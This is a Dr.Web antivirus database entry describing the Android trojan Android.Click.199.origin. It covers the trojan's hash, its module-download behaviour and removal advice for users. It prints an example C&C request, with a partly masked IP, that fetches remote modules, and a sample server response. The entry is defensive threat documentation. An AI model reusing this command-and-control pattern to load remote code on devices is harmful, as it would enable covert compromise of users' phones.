Bibliothèque
Ma bibliothèque

+ Ajouter à la bibliothèque

Contacter-nous !
Support 24/24 | Rules regarding submitting

Nous téléphoner

0 825 300 230

Forum

Vos requêtes

  • Toutes : -
  • Non clôturées : -
  • Dernière : le -

Nous téléphoner

0 825 300 230

Profil

Android.Click.199.origin

Added to the Dr.Web virus database: 2017-11-14

Virus description added:

SHA1:

  • e730007d2f7a6c4988d0486a7f723ba3d5d47629

An Android Trojan which is a JAR file. It is a component of the malicious program Android.RemoteCode.106.origin, which automatically launches the Trojan after downloading.

After its launch, Android.Click.199.origin operates until it gets a command to shut down. The Trojan downloads and launches a malicious component x.awv.Awv (Android.Click.201.origin). Every minute, Android.Click.199.origin checks the last update time of this module. If more than 10 minutes passed after the last update of the component x.awv.Awv, the Trojan requests a new version from the C&C server. The time intervals of the module update and check are set in the configuration file of the malicious application which was obtained from the server.

Example of the request:

GET http://*.*.65.235:18011/sys/action/?t=0&pn=com.antee.biblicalquiz&aid=99d078094e1be3b9&av=16&brand=unknown&model=sd
 HTTP/1.1 k&msg=eyJmIjp0cnVlfQ==&tid=&sv=10
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.2; sdk Build/MASTER)
Host: *.*.65.235:18011
Connection: Keep-Alive
Accept-Encoding: gzip

An example of the server response:

{
   "result":true,
   "data":[
      {
         "l":"/sys/module/load/3798b9d0-e307-4d31-b8a3-b0548010580f/",
         "h":"bb847f3156916617bea51f0af377d0a1"
      }
   ],
   "sessionId":"97503090-c52b-11e7-92f9-eb0023df245c"
}

Recommandations pour le traitement


Android

  1. Si votre appareil mobile fonctionne correctement, veuillez télécharger et installer sur votre appareil mobile le produit antivirus gratuit Dr.Web для Android Light. Lancez un scan complet et suivez les recommandations sur la neutralisation des menaces détectées.
  2. Si l'appareil mobile est bloqué par le Trojan de la famille Android.Locker (un message sur une violation grave de la loi ou une demande de rançon s’affichent sur l'écran de l'appareil mobile), procédez comme suit :
    • démarrez votre Smartphone ou votre tablette en mode sans échec (si vous ne savez pas comment faire, consultez la documentation de l'appareil mobile ou contactez le fabricant) ;
    • puis téléchargez et installez sur votre appareil contaminé le produit antivirus gratuit Dr.Web для Android Light et lancez un scan complet puis suivez les recommandations sur la neutralisation des menaces détectées ;
    • Débranchez votre appareil et rebranchez-le.

En savoir plus sur Dr.Web pour Android